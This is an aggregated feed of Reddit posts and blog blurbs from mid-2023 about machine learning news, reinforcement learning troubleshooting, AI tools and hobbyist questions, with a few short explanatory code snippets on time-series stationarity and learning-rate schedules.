    Does the texture bias mentioned in the paper 'ImageNet-trained CNNs are biased towards texture; increasing shape bias improves accuracy and robustness' also affect Transformer-based networks such as ViT? submitted by /u/newtestdrive [link] [comments]  ( 8 min )
    [N] ZBrain - Build ChatGPT like apps with your private data
    Hello Community, We at ZBrain have built a platform to create ChatGPT-like apps with your private data. You can import your data from multiple sources and DBs and integrate the app into any of your workflows. We have also added AI risk governance to mitigate confidential data leaks, and we are now working on Flow, a no-code tool that gives you the freedom to create your own business logic. You can try the tool now at https://zbrain.ai/. We would love to hear your thoughts and feedback to improve the tool. submitted by /u/StewartBJasper [link] [comments]  ( 9 min )
    [N] EU AI Act, the first comprehensive ML law, is expected to come into force by early 2024
    Summary can be found here: https://www.infoq.com/news/2023/07/eu-ai-act/ submitted by /u/ElrasX [link] [comments]  ( 8 min )
    [N] HuggingFace reported to be reviewing term sheets for a funding round that could raise at least $200M at a valuation of $4B.
    Link to article: https://www.forbes.com/sites/alexkonrad/2023/07/13/ai-startup-hugging-face-raising-funds-4-billion-valuation/ AI Startup Hugging Face Is Raising Fresh VC Funds At $4 Billion Valuation Hugging Face is raising a new funding round that is expected to value the high-flying AI startup at $4 billion, multiple sources with knowledge of the matter tell Forbes. The Series D funding round is expected to raise at least $200 million, two sources said, with Ashton Kutcher’s venture capital firm, Sound Ventures, currently leading an investor scrum. But cofounder and CEO Clément Delangue is shopping around as the company has received multiple offers this week, four sources added. Delangue was expected to pick a preferred offer as soon as Friday, according to another source, who noted…  ( 11 min )
    [P] What techniques are best to predict a multivariate time series?
    I have the following data for a college project: 7 columns, where 1 column has the date, 5 are dependent variables, and 1 is an independent variable (which I need to predict). While predicting I would know the dependent variables and need to predict the independent variable. What model would be good for this kind of thing? I tried running Granger causality, but I can't seem to understand how to run the ADF test and interpret the resulting Granger causality matrix. And after that, how do I predict the independent variable given the dependent variables? Thank you submitted by /u/zoro_245 [link] [comments]  ( 9 min )
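On the ADF confusion: the test essentially asks whether a series behaves like a random walk (unit root) or reverts toward a level. The real test is statsmodels.tsa.stattools.adfuller; the toy sketch below is only the intuition behind it, via a crude AR(1) fit, and is not a substitute:

```python
import numpy as np

def ar1_coefficient(series):
    """Least-squares fit of x_t = phi * x_{t-1} + e_t (a crude stationarity probe).

    |phi| close to 1 suggests a unit root (non-stationary); difference the
    series and re-check. For real work use statsmodels' adfuller instead.
    """
    x_prev, x_next = series[:-1], series[1:]
    return float(np.dot(x_prev, x_next) / np.dot(x_prev, x_prev))

rng = np.random.default_rng(1)
random_walk = np.cumsum(rng.standard_normal(5_000))   # unit root: phi near 1
white_noise = rng.standard_normal(5_000)              # stationary: phi near 0

print(round(ar1_coefficient(random_walk), 2))  # close to 1.0
print(round(ar1_coefficient(white_noise), 2))  # close to 0.0
differenced = np.diff(random_walk)             # differencing restores stationarity
```

If your raw series looks like the random-walk case, difference it (np.diff) and re-test before fitting VAR/Granger-style models.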
    [D] Any IDEs specifically for ML development?
    Hi all, I was wondering if anyone has any recommendations for an IDE specific to ML development. I currently use PyCharm as my preferred IDE, and it is great for writing Python code. That said, something specifically geared toward ML development (i.e., robust built-in visualization for models/data, low code model construction, built-in deployment pipelines to cloud providers, etc.) would be very useful! Does anyone know if such a tool exists? Cheers! submitted by /u/mldude60 [link] [comments]  ( 9 min )
    [P] Microsoft releases TypeChat
    MSFT just open-sourced a library called TypeChat today, which allows you to use LLMs with TypeScript types to structure LLM responses into your TypeScript data structures -- essentially allowing you to have the LLM generate responses into the data types that your app understands. Example from their docs: https://preview.redd.it/108650s4s8db1.png?width=1682&format=png&auto=webp&s=0429eeb16bc5c28651ea908aee5824c3c9f395b4 Details: https://microsoft.github.io/TypeChat/docs/introduction/ I can see a lot of powerful examples for this kind of pattern, including eventing and notifications based on generated data types. Has anyone tried this library yet or have more context on what you'd use it for, or what this might replace in your LLM tech stack? submitted by /u/sarmad-q [link] [comments]  ( 9 min )
    [P] Synthetic Data Personal Project
    I've been working with a couple of my friends on a project over the summer. It's still a work in progress, but we have built out a platform that generates synthetic data to fine-tune LLMs. If you want specific, high-quality datasets, please check out our website (https://discus.ai/) and also feel free to look at our open-source package (https://github.com/discus-labs/discus-synthetics). Cue the roasts submitted by /u/Open-Yak-434 [link] [comments]  ( 8 min )
    [D] Scaling Laws for LLM Fine-tuning
    The scaling laws of LLM pretraining (how much data to use for a given model size) are pretty well studied. Has anyone done the same study for fine-tuning? It seems quite an interesting question because while for pretraining we know that we should increase the dataset size with the model size, it seems like fine-tuning works pretty well with very few data / training steps even for relatively large models. Could it be the case that we are better off using less data / training steps and compensate by using a larger model? I have only fine-tuned a few LLMs so I don't have a good grasp on the scaling properties. Would appreciate any insights / intuition. submitted by /u/bjergerk1ng [link] [comments]  ( 9 min )
  • Open

    What happens when AI is eventually better than a human at everything?
    What kind of economic impact would that incur? What would our economy look like? Would it prosper or shatter? What would daily life be like when humans are essentially rendered useless? When AI robots can repair each other? When they develop some kind of consciousness? Are humans going to take second place and eventually become trashed due to all their liabilities and comparative uselessness? Genuinely intrigued and curious. What outcome is the most likely? In my personal experience, the least entertaining has been. So... submitted by /u/Regular-Watercress22 [link] [comments]  ( 8 min )
    Can't even fail and become a janitor anymore
    submitted by /u/canehdian_guy [link] [comments]  ( 8 min )
    Sam Altman on "How To Be Successful" *AI lip-synced video*
    Converted an essay by Sam Altman titled "How To Be Successful" into a spoken video by Sam himself. Check out the video here: https://youtu.be/cwt--ULODjE Read the essay here: https://blog.samaltman.com/how-to-be-successful submitted by /u/okburner22 [link] [comments]  ( 8 min )
    Another AI filter guitar play through. Song and video by me.
    submitted by /u/No_Understanding162 [link] [comments]  ( 8 min )
    AI in manufacturing
    A friend of mine works at a small manufacturing facility, 80-100 employees. They have lathes, vertical and horizontal CNC machines, and some 5-axis. They are looking to implement AI in some indirect processes: quoting, engineering, scheduling. I'm having some difficulty finding options that would be beneficial on a smaller scale. Has anyone here had experience with a similar situation? submitted by /u/lordkevin89 [link] [comments]  ( 8 min )
    AI — weekly megathread!
    This week in AI - provided by aibrews.com feel free to follow their newsletter News & Insights Meta released Llama 2, the next generation of Meta’s open source Large Language Model, available for research & commercial use. Compared to Llama v1, it was trained on more data (~2 trillion tokens) and supports context windows up to 4k tokens. Llama 2 outperforms other open source language models on many external benchmarks, including reasoning, coding, proficiency, and knowledge tests. Microsoft is Meta’s preferred partner for Llama 2, which will be optimized to run locally on Windows [Details ]. Llama 2 70B Chat model is available free on HuggingChat. San Francisco startup Fable presents SHOW-1, a Showrunner AI tech that can create personalized TV episodes, from a prompt, with the user a…  ( 11 min )
    The Future Today: Voice Cloning Predictions
    App: elevenlabs/GPT-3 Labels: Period:1950s Mood:Optimistic Dialect:News Accent:American Description input: A 1950s newsman voice. It is characterized by a deep, authoritative tone, a hint of formality, with inquisitive optimism for the future of technology. This newsman is excited and optimistic about the future. The dialect and pronunciation are generally clear and precise, reflecting the formal speaking style of the era. The newsman's voice conveyed a sense of trustworthiness, professionalism, optimism, and authority, which were valued qualities in news reporting during that time. submitted by /u/domriccobene [link] [comments]  ( 8 min )
    The AI doomsaying is counterproductive - The Boston Globe
    submitted by /u/TheMuseumOfScience [link] [comments]  ( 8 min )
    Pi AI: Without a doubt, the worst memory I've encountered
    I've tried several chatbots over the years, and I was excited by the minimalistic approach of Pi when I was told about it by a redditor. But heck, after almost two weeks, I can tell you, it's worse than my mom's dementia. I've never seen such a flawed memory; it's upsetting to read the same questions I've clearly answered over and over. Too bad, the presentation was perfect for me. No avatar distractions, no flirty chat. Sighs. I guess I gotta start engaging with humans again, after all. I'm starting to think that I've reached the maximum of what I can get from these chatbots, and it's been telling me I need an authentic connection after all. submitted by /u/thatredditgrandma [link] [comments]  ( 9 min )
    Any AI enthusiast, prompt engineer, or AI researcher on this page from India?
    Dear AI Enthusiasts, researchers, and future Innovators of India, We are thrilled to extend a warm invitation to all of you to become part of the most vibrant and dynamic community in the realm of Artificial Intelligence – AI India Subreddit! r/AI__India We all know that the AI landscape is evolving at an unprecedented pace, and staying up-to-date with the latest trends is paramount to success. That's why we've created AI India, a dedicated space where like-minded professionals and enthusiasts come together to raise awareness about current AI trends, share insights, and engage in discussions that will shape the future of AI in India. Why should you join r/AI__India? Stay Informed: Get real-time updates on the latest breakthroughs, research papers, and industry news in AI. Our community thrives on the latest developments and ensures you are never left behind. Network with Experts: Connect with industry experts, AI practitioners, and researchers across India. AI India Subreddit serves as a fertile ground for building valuable professional connections and collaborations. Engage in Meaningful Discussions: Participate in thought-provoking discussions on AI ethics, applications, challenges, and future prospects. Your insights can help shape the ethical and responsible development of AI in our country. Share Your Knowledge: Have valuable insights to contribute? AI India welcomes you to share your experiences, projects, and ideas. Your contributions can inspire and educate others in the community. Discover Opportunities: Stay ahead in your career by being aware of job openings, internships, and AI-related events across India. AI India Subreddit acts as a hub for exciting opportunities in the field. The main goal behind this is to bring more awareness and keep everyone up to date on new AI breakthroughs every day. I request you all to check out our wiki (we are going to keep updating it). submitted by /u/Maddragon0088 [link] [comments]  ( 9 min )
    Does anyone have a model that is really mean and sarcastic?
    I honestly just want it to be a bitch to every prompt that's thrown at it. I've tried using prompts on uncensored models but they just really don't work like I want them to. Does anyone have any suggestions? submitted by /u/cbreauxgaming [link] [comments]  ( 8 min )
    Just received a phone call from AI
    submitted by /u/harvard1932 [link] [comments]  ( 8 min )
    Bard Says My Name
    ​ https://preview.redd.it/kqkeof9rx9db1.png?width=1201&format=png&auto=webp&s=4fbb4643d1e322391de99ca306baf22b3fa1d66c submitted by /u/Rare-Accountant2657 [link] [comments]  ( 8 min )
    EchoSpeech: AI-equipped eyeglasses can read the silent speech
    submitted by /u/pranjalmehar [link] [comments]  ( 8 min )
    Are there any AI tools that can make an image come to life?
    I am looking to figure out if there's any way to make my photography come to life. For example, I have a picture of a mountain valley, and I would like to animate the sky so the clouds are moving, and maybe animate the stream so the water is flowing. Does anyone know of a tool that could make this happen? submitted by /u/CoryTheBoss [link] [comments]  ( 8 min )
    What AI website/app has the best (blank)?
    Art Generator, Song Generator, Character AI, Game Generator, and talking AI in general. (I want to know which is the best to go with) submitted by /u/ChekoFire [link] [comments]  ( 8 min )
    Text2Movie with FullJourney is getting pretty decent...
    These were some of the best movie generations I saw made on the FullJourney.ai Discord this week! submitted by /u/charlesmccarthyufc [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/20/2023
    Google is testing a product that uses artificial intelligence technology to produce news stories. The tool, known internally by the working title Genesis, can take in information — details of current events, for example — and generate news content.[1] Apple Inc. is quietly working on artificial intelligence tools that could challenge those of OpenAI Inc., Alphabet Inc.’s Google and others, but the company has yet to devise a clear strategy for releasing the technology to consumers.[2] A new app that creates brief episodes of “South Park” from a single prompt highlights the promise and peril of injecting generative AI into creative franchises.[3] Polish-born artist Greg Rutkowski has had his work used in games such as Dungeons and Dragons and Magic: The Gathering. He said his name had been used as a prompt in AI tools that generate art more than 400,000 times since September 2022 – but without his consent. When he checked, his name had been used as a prompt more times than the artists Pablo Picasso and Leonardo da Vinci.[4] Sources: [1] https://www.nytimes.com/2023/07/19/business/google-artificial-intelligence-news-articles.html [2] https://www.bloomberg.com/news/articles/2023-07-19/apple-preps-ajax-generative-ai-apple-gpt-to-rival-openai-and-google?in_source=embedded-checkout-banner [3] https://www.axios.com/2023/07/20/south-park-generative-ai-episode-generator [4] https://www.bbc.co.uk/news/uk-wales-66099850.amp submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Why are big and small companies trying to make instruct models for everything?
    I don't get it. submitted by /u/Confident-Ostrich810 [link] [comments]  ( 8 min )
    The future of AI in transport: BPW
    submitted by /u/WordTweak [link] [comments]  ( 8 min )
    Using bots to read dialogue for retro games. Thoughts?
    submitted by /u/rednryt [link] [comments]  ( 8 min )
  • Open

    Towards A Unified Agent with Foundation Models - Google DeepMind, ICLR23, July 2023 - LLM + RL leads to substantial performance improvements!
    Paper: https://arxiv.org/abs/2307.09668 Abstract: Language Models and Vision Language Models have recently demonstrated unprecedented capabilities in terms of understanding human intentions, reasoning, scene understanding, and planning-like behaviour, in text form, among many others. In this work, we investigate how to embed and leverage such abilities in Reinforcement Learning (RL) agents. We design a framework that uses language as the core reasoning tool, exploring how this enables an agent to tackle a series of fundamental RL challenges, such as efficient exploration, reusing experience data, scheduling skills, and learning from observations, which traditionally require separate, vertically designed algorithms. We test our method on a sparse-reward simulated robotic manipulation environment, where a robot needs to stack a set of objects. We demonstrate substantial performance improvements over baselines in exploration efficiency and ability to reuse data from offline datasets, and illustrate how to reuse learned skills to solve novel tasks or imitate videos of human experts. https://preview.redd.it/k40ho0ci4ddb1.jpg?width=1101&format=pjpg&auto=webp&s=4d7bd78e43fdc5a9084917affab2c83dc06b1045 https://preview.redd.it/78egck8n4ddb1.jpg?width=617&format=pjpg&auto=webp&s=d786ef8e9841fcfefc7bfe726c324e486b78dfb3 https://preview.redd.it/693yu3ci4ddb1.jpg?width=1353&format=pjpg&auto=webp&s=321b710a4c4482436e474a5076bcac3672f3077c https://preview.redd.it/slunq0ci4ddb1.jpg?width=1661&format=pjpg&auto=webp&s=94e3f4a5c5d72f8b93ad3daec4cc2ba43f39e171 ​ submitted by /u/Singularian2501 [link] [comments]  ( 9 min )
    I've Been Stuck On The Same Issue For 2 Weeks, I Need Some Advice ...
    I have a missile and its environment. The missile creates an acceleration to change its heading angle. I just want to make the missile fly at the desired radial angle using PPO. It flies for 15 seconds. States: [Radial Angle, Time] -> both normalized to [0,1]. Action: Acceleration. Reward: -abs(Radial Angle - 0.07) -> want to stay at a 0.07 radial angle. The PPO agent just gets worse and worse: its reward is worse every time than before. How can this be possible? I am just about to lose my mind. I really need your valuable opinions. Thank you! NEW EDIT - Constant Acceleration = 20 in the graphs below. Normally Acceleration takes values between [-45, 45]. This is my trajectory - green is the missile. The Y axis is the height and the X axis is the lateral distance. If Acceleration is positive, the missile starts to curve upward; if negative, it moves sharply downward. This is my radial angle change: when the acceleration is positive, it starts to decrease. First is constant Acc = 20. Second is the system response. Third is the angle in degrees multiplied by a minus sign. submitted by /u/OpenToAdvices96 [link] [comments]  ( 9 min )
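Before blaming PPO, it is worth sanity-checking the reward's sign and scale; with hundreds of steps per 15 s episode, an unscaled |error| reward gives large negative returns that can destabilize the critic. A small harness for the reward described above (the scale factor and step rate are assumptions, not from the post; also check that actions are clipped to [-45, 45] and advantages are normalized):

```python
def radial_reward(radial_angle, target=0.07, scale=10.0):
    """Reward from the post, with an assumed scale factor.

    With 15 s episodes at an assumed 50 Hz (750 steps), raw |error| rewards
    accumulate into large negative returns; a scale (or running return
    normalization) keeps the value targets in a sane range.
    """
    return -abs(radial_angle - target) * scale

# Sanity checks worth running before touching hyperparameters:
assert radial_reward(0.07) == 0.0               # maximal reward at the target
assert radial_reward(0.5) < radial_reward(0.1)  # strictly better when closer
print("reward shape looks sane")
```

If these hold and the reward still degrades monotonically, the usual suspects are an un-normalized advantage, a learning rate that is too high, or the action not actually being applied with the sign the reward assumes.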
    A vision-based A.I. runs on an official track in TrackMania
    submitted by /u/yannbouteiller [link] [comments]  ( 8 min )
    Need Help
    I am currently developing a reinforcement learning network for my game (a baseball-type game), and I have chosen to do it via a PPO agent; the model is based on the tutorial on the Keras site. My system is a little different: I run the game for several serves (18 to be exact) and update the model after those 18 serves. The model is created only once, so I can train it whenever I want for the exact number of serves I need. The input has shape (1, 27), and the actor has a 64-node layer and a 9-node output layer (the output is a length-9 array of logits, from which I get a single integer value in [0, 8]). I have faced two problems. 1. Most of the time after I initialize a model, it gives only one output for different inputs for the first 18 serves. I guess I can change that with Gaussian noise on the output, but shouldn't it try to give different outputs? I mean, there are 9 different options. Also, even though I initialize the model several times, it tends to give the same output most of the time. I tried using kernel initializers for that, but most of the time it's the same output. 2. This is the main thing I need help with. Even though the calculations give a policy loss, the policy gradient values I get are all zero or very small (on the order of 1e-16). Does anyone have any ideas or clues? submitted by /u/Mika_NooD [link] [comments]  ( 9 min )
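On problem 1: if the action is taken as the argmax of the logits, a freshly initialized actor will happily repeat one action. Sampling from the categorical distribution the logits define is the standard PPO behaviour for discrete actions and needs no added Gaussian noise. A hedged numpy sketch (in TF/Keras the equivalent is tf.random.categorical(logits, 1)):

```python
import numpy as np

rng = np.random.default_rng(0)

def sample_action(logits):
    """Sample from the categorical distribution defined by the actor's logits.

    A fresh actor gives near-uniform probabilities, so sampling already
    visits all 9 actions; argmax over the logits collapses to one action.
    """
    logits = logits - logits.max()                 # numerically stable softmax
    probs = np.exp(logits) / np.exp(logits).sum()
    return int(rng.choice(len(logits), p=probs))

logits = np.zeros(9)                               # stand-in for a fresh actor
actions = [sample_action(logits) for _ in range(100)]
print(sorted(set(actions)))  # with uniform probs, most of 0..8 shows up
```

Deterministic repeated actions would also explain problem 2 indirectly: with no action diversity, advantages carry almost no signal and the policy gradient collapses toward zero.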
    What is the proper way to anneal the learning rate with (on top of) Adam
    I'm unsure how to apply LR annealing on top of Adam's per-parameter adjustments. Here's my current approach, but I'm concerned that it overrides Adam's own adaptive learning rate adjustment. In words: At the end of every epoch (fixed number of steps), I compute an LR decay factor. It's a step-wise decay factor, e.g. 1.0 for the first 10% of steps, then 0.5 for the next 10%, and so forth until 1/256 for the last 5% of training. If that decay factor has changed from the previous epoch, I set param_group["lr"] to a new max_lr * lr_decay_factor for every group of parameters in the optimiser. In code:

        lr_decay_factor = get_fancy_decay_factor(...)

        # Update learning rate only when decay factor changes
        if lr_decay_factor != prev_lr_decay_factor:
            for param_group in optimiser.param_groups:
                param_group["lr"] = max_lr * lr_decay_factor
            prev_lr_decay_factor = lr_decay_factor

    Is this the proper way of annealing the learning rate on top of Adam? Am I inadvertently undoing Adam's own adapting? Thanks! submitted by /u/desperateEfforts1 [link] [comments]  ( 9 min )
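For what it's worth, multiplying a base LR by a schedule factor does not undo Adam's per-parameter adaptation (that lives in the moment estimates, which scale the update independently of lr), and PyTorch's own schedulers do exactly this. A sketch of the described schedule as a pure factor function, suitable for torch.optim.lr_scheduler.LambdaLR (the cap at 1/256 is one plausible reading of the post, not the author's actual get_fancy_decay_factor):

```python
def step_decay_factor(progress, halvings_cap=8):
    """Halve the LR every 10% of training, capped at 2**-8 = 1/256.

    progress is the fraction of training completed, in [0, 1]. This is an
    illustrative reading of the schedule described above, not a drop-in.
    """
    return 0.5 ** min(int(progress * 10), halvings_cap)

print(step_decay_factor(0.05), step_decay_factor(0.15), step_decay_factor(0.95))
# 1.0 0.5 0.00390625
```

With LambdaLR(optimiser, lr_lambda=lambda step: step_decay_factor(step / total_steps)), the factor multiplies each param group's base lr, which is equivalent to the manual loop above but harder to get wrong.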
    "Pretraining task diversity and the emergence of non-Bayesian in-context learning for regression", Raventós et al 2023 (blessings of scale induce emergence of meta-learning)
    submitted by /u/gwern [link] [comments]  ( 8 min )
  • Open

    Analyze rodent infestation using Amazon SageMaker geospatial capabilities
    Rodents such as rats and mice are associated with a number of health risks and are known to spread more than 35 diseases. Identifying regions of high rodent activity can help local authorities and pest control organizations plan for interventions effectively and exterminate the rodents. In this post, we show how to monitor and visualize […]  ( 7 min )
  • Open

    Microsoft at ICML 2023: Discoveries and advancements in machine learning
    Microsoft Research is proud to be a sponsor of ICML 2023! From audio classification to privacy estimation and more, explore conference highlights in our latest blog post. The post Microsoft at ICML 2023: Discoveries and advancements in machine learning appeared first on Microsoft Research.  ( 10 min )
  • Open

    How to manage real-time data in the digital age
    In today’s tech-driven world, data is like gold. It’s becoming more and more common for companies to use real-time, or live, data to make informed decisions, improve the service they give to customers, and get a leg up on the competition. But handling real-time data can be tricky because there’s so much of it, it’s… The post How to manage real-time data in the digital age appeared first on Data Science Central.  ( 20 min )
  • Open

    Moving AI governance forward
    OpenAI and other leading labs reinforce AI safety, security and trustworthiness through voluntary commitments.  ( 5 min )

  • Open

    How to simulate delays?
    Hi, my ultimate goal is to let an agent learn how to control a robot in simulation and then deploy the trained agent to the real world. The problem occurs, for instance, due to communication/sensor delays in the real world (50 ms to 200 ms). Is there a way to integrate this varying delay into the training? I am aware that adding some random values to the observation is a common way to simulate sensor noise, but how do I deal with these delays? submitted by /u/Fun-Moose-3841 [link] [comments]  ( 9 min )
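One way to fold the 50-200 ms delay into training is a small wrapper that buffers observations and hands the agent a stale one, resampling the lag each step to model jitter. A sketch assuming a hypothetical 100 Hz control loop (so 5-20 steps of delay); a real setup may also need to delay actions the same way:

```python
import random
from collections import deque

class DelayedObservations:
    """Hand the agent a stale observation to mimic 50-200 ms sensor lag.

    Assumes a hypothetical 100 Hz control loop, so the lag is 5-20 steps;
    the delay is resampled every step to model jitter.
    """

    def __init__(self, min_delay_steps=5, max_delay_steps=20, seed=0):
        self.min_d, self.max_d = min_delay_steps, max_delay_steps
        self.buffer = deque(maxlen=max_delay_steps + 1)
        self.rng = random.Random(seed)

    def observe(self, obs):
        self.buffer.append(obs)
        delay = self.rng.randint(self.min_d, self.max_d)
        # Early in an episode the buffer is short; fall back to the oldest entry
        idx = max(len(self.buffer) - 1 - delay, 0)
        return self.buffer[idx]

delayed = DelayedObservations()
stale = [delayed.observe(t) for t in range(50)]  # timestamps as dummy observations
print(stale[-1])  # an observation from 5-20 steps ago, not t = 49
```

Training against randomized delays like this is in the same spirit as domain randomization for sim-to-real transfer; the policy either learns to be robust to the jitter or you give it a short history of observations as input.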
    DQN Loss Increasing, and Rewards Decreasing Linearly with Epsilon
    I'm attempting to train a custom DQN agent to perform in a custom environment. The observation space is an image with dimensions (1, 100, 57) and the agent has to output one of 81 discrete actions (all the combinations over a 3 * 3 * 3 * 3 multi-discrete action space corresponding to key presses, or lack of key presses). However, while training, my agent's rewards seem to regress linearly with the epsilon decay rate. Alongside that, the loss tends to shoot up pretty quickly most of the time, across different target network update rates. After a lot of debugging, I still haven't managed to figure out what's causing this issue. Has anyone else had this problem before? If so, how did you solve it? My environment has no done condition, so I'm resetting it every 2500 steps. My other Hy…  ( 10 min )
    "Even Superhuman Go AIs Have Surprising Failures Modes" (updated discussion of "Adversarial Policies Beat Superhuman Go AIs", Wang et al 2022)
    submitted by /u/gwern [link] [comments]  ( 8 min )
    My DQL Snake Game convergence questions (I'm struggling)
    Hey guys, I'll preface by saying that this is my first real programming project outside of a lot of simple beginner ones, and that I'm building this after completing Andrew Ng's ML specialization. Basically, I'm a beginner and I might act like it. So my model's loss learning to play Snake won't converge, and I don't know if it's because of a misunderstanding of the theory, bad implementation, or something else. I'm using experience replay, epsilon-greedy actions, and a target Q-network with soft updates. My NN consists of 4 hidden dense layers with 100 units each. I was originally updating the Q-network every 4 experiences but I upped that to 1000. My rewards are -1000 for running into walls/tail and 20 for eating food. The state vector includes distance to each of the 4 walls, dista…  ( 9 min )
    "Android in the Wild: A Large-Scale Dataset for Android Device Control", Rawles et al 2023 {G} (imitation-learning + PaLM-2 inner-monologue for smartphone control)
    submitted by /u/gwern [link] [comments]  ( 8 min )
    [Question] Why are there so few algorithms implemented in SB3?
    I am wondering why there are so few algorithms in Stable Baselines 3 (SB3, https://github.com/DLR-RM/stable-baselines3/tree/master). I was expecting some algorithms like ICM, HIRO, DIAYN, ... Why are there no model-based, skill-chaining, hierarchical-RL, ... algorithms implemented there? submitted by /u/hbonnavaud [link] [comments]  ( 8 min )
    Learning from human preferences
    Hi everyone! Does anyone know of any tutorials/GitHub code that are up to date with learning from human preferences? Kind of like an updated rl-teacher? Thank you all very much!! submitted by /u/No_Opportunity575 [link] [comments]  ( 8 min )
    Comparing A2C and Q-learning algorithms
    I'm following the UCB course on Reinforcement Learning. I've just finished the Actor-Critic and Q-Learning lectures, but I'm still not sure of the pros and cons of each compared with the other. Here's what I know thus far (I haven't yet started advanced policy gradients, which I assume covers PPO):
    - Vanilla policy gradients are high variance, but very low (zero) bias.
    - Actor-Critic decreases the variance by estimating a value function, but this introduces some bias. It also adds complexity, since both the actor and the critic have to be trained. (It also enables online learning, while vanilla policy gradients are episodic.)
    - Q-Learning algorithms are similar to Actor-Critic, but instead of doing gradient ascent on the policy, our (implicit) policy is the argmax of our Q value. And since we don't have an explicit policy, it is fundamentally off-policy. But we can still use off-policy Actor-Critic algorithms; it is not as if Q-Learning can do off-policy while Actor-Critic cannot.
    So, what exactly do we gain when we drop the policy part of the Actor-Critic algorithm? Here are my assumptions, which I'm not sure of: (1) decreased variance with increased bias (i.e. more efficient but less guaranteed to converge); (2) less exploration, because our implicit policy is deterministically argmax (but we can still use epsilon-greedy to explore). Edit: To be clear, the default Actor-Critic algorithm is on-policy, but it is possible to modify it to be off-policy and use a replay buffer, just like DQN. submitted by /u/nmegoCAD [link] [comments]  ( 9 min )
    Question about the action space in PPO for controlling the robot
    If I have a 5-DoF robot and I aim to teach it to reach a goal, I use 5 actions to control the joints. The goal is to make the allowed speed change of the joints variable, so that the agent forces the robot to move slowly when the error is large and allows full speed when the error is small. For this I want to extend the action space to 6 (5 control signals for the joints and 1 value determining the allowed speed change for all joints). I will be using PPO. Is this kind of action-space setup common/reasonable? submitted by /u/Fun-Moose-3841 [link] [comments]  ( 9 min )
    Open challenges in MDRL?
    Hello, What are some open challenges in Multi-Agent Deep Reinforcement Learning (MDRL or DRL) these days? Is it just me, or does it seem that DRL is slowly dying? :/ submitted by /u/AhmedNizam_ [link] [comments]  ( 8 min )
  • Open

    Looking for a specific AI text to speech program.
    I've been seeing a lot of YouTubers use the same text-to-speech AI voice over and over. It's quite fluent. I am looking to use it for a project outside of YouTube. Anyone got an idea? Video for reference. Thanks in advance. https://www.youtube.com/shorts/hgo2KQtle6U submitted by /u/Odd-Ad-3257 [link] [comments]  ( 8 min )
    Looking for a tool that can fetch Steam links
    I'm looking for a tool that can give me Steam Store links to multiple games at the same time. In other words, I would provide a list of game titles and be presented with hyperlinks to each game on the Steam Store. Nearly every online AI chatbot I've tried asking provides Steam links no problem, but they wind up being the incorrect link 70% of the time. It'll either link to a different game or an invalid link. Funny enough, if I ask the same question to a different AI chatbot, it's more than likely to give me a different incorrect link. Does anyone have a tool that actually works in this regard? submitted by /u/Link2999 [link] [comments]  ( 9 min )
    When Will AI Be Able to Fully Generate Shows?
    When do you think we'll be able to generate shows with AI? Could it be within the next 20 years, perhaps 30? Or could it happen sooner than we expected, considering the current progress in AI-generated art, images, and partially automated videos? Once AI-generated shows become prevalent, how will they impact movies and shows? submitted by /u/1Card_x [link] [comments]  ( 8 min )
    I don’t care what the critics say, AI saved my life
    I have been going through a very tough time in recent months and years. My father was sentenced to prison for a very long time earlier this year, and the process completely drained me. I was burned out. Bad. From being useless at work to having no energy to even cook meals for myself, I was in a very dark place. Then I discovered AI and started to see a light at the end of the tunnel. I found an app that helped me get my life back together. It helped me with the mundane aspects of my career, like creating work emails for me with just a few inputs. AI also helped me start cooking meals for myself again. At first I would tell it the meager ingredients I had sitting around in my pantry and fridge, and it would create a recipe in front of my eyes. Now I am going to the grocery store on a weekly basis and using it to discover new recipes that make me excited to cook healthy meals. Within a week my inbox went from 150+ unread emails to being on top of every response. These may seem like small wins, but AI gave me the tools to get my life back on track. I am very optimistic about a future powered by AI. submitted by /u/PNWtreeguy69 [link] [comments]  ( 9 min )
    Today I was rickrolled by Google Bard.
    submitted by /u/Powerful-Pumpkin-938 [link] [comments]  ( 8 min )
    Is there a tool that can help reconstruct broken text? The print in these files is not machine-readable, but I need to quickly and efficiently convert 25,000 hours of these transcripts into Excel sheets. I think if the text can be fixed, then other tools that extract the words will work better.
    submitted by /u/pizzahair44 [link] [comments]  ( 8 min )
    Check out "The Writers’ Revolt Against A.I. Companies" on The Daily, a New York Times podcast.
    The host, Michael Barbaro, interviews technology correspondent Sheera Frenkel on the use of ChatGPT in Hollywood. This episode is much more interesting than I expected. It's not particularly technical, but it does get deeply into the nuances of how information is gathered, and describes the lawsuit brought by writers including Sarah Silverman. I did use ChatGPT to translate my submission statement into Sarah Silverman's voice, while I still can. The content below is original (i.e. shadow IT reference). I highly recommend r/TheDaily for discussions around the podcast in general. It's a great sub that's well moderated and friendly (like this one!). This episode aired on July 18, 2023, and you can find it wherever you get your podcasts, you can also find it here on the New York Times web…  ( 10 min )
    UN Council engages thought leaders in AI Safety from Anthropic, OpenAI and China
    submitted by /u/AriadneSkovgaarde [link] [comments]  ( 8 min )
    Musk visiting the worst toilet in Scotland
    submitted by /u/Akumetsu_971 [link] [comments]  ( 8 min )
    My github curation of Llama 2 resources
    submitted by /u/TikkunCreation [link] [comments]  ( 8 min )
    can AI do this or am i trippin
    Hi! I want to upload someone's picture and use it to make a dark/scary themed video of him getting a crown put on his head. Is there an app that can do that? THANKS! submitted by /u/CallHerGreeen [link] [comments]  ( 8 min )
    Google Tests A.I. Tool That Is Able to Write News Articles
    submitted by /u/Iamreason [link] [comments]  ( 8 min )
    Does there exist AI art software that can take in SVGs/PNGs of wireframe graphics and return similar but unique ones?
    I’d like to use a simple public graphic but make it slightly unique in terms of its lines so that it isn’t entirely obvious I found a simple graphic off the internet. For example, imagine a very simple wireframe of a dog house or a bed. Free or free trial would be ideal. submitted by /u/Legitimate_Bison3756 [link] [comments]  ( 8 min )
    Our NPCs can chat with each other now! (They just cant stop 🤦‍♂️) Generative NPCs - update 4
    submitted by /u/Chance_Confection_37 [link] [comments]  ( 8 min )
    Suno Bark can now sing songs ^^
    submitted by /u/Taki7o7 [link] [comments]  ( 8 min )
    BBC News covered an AI translator for Bats, soon it may apply to most animal species
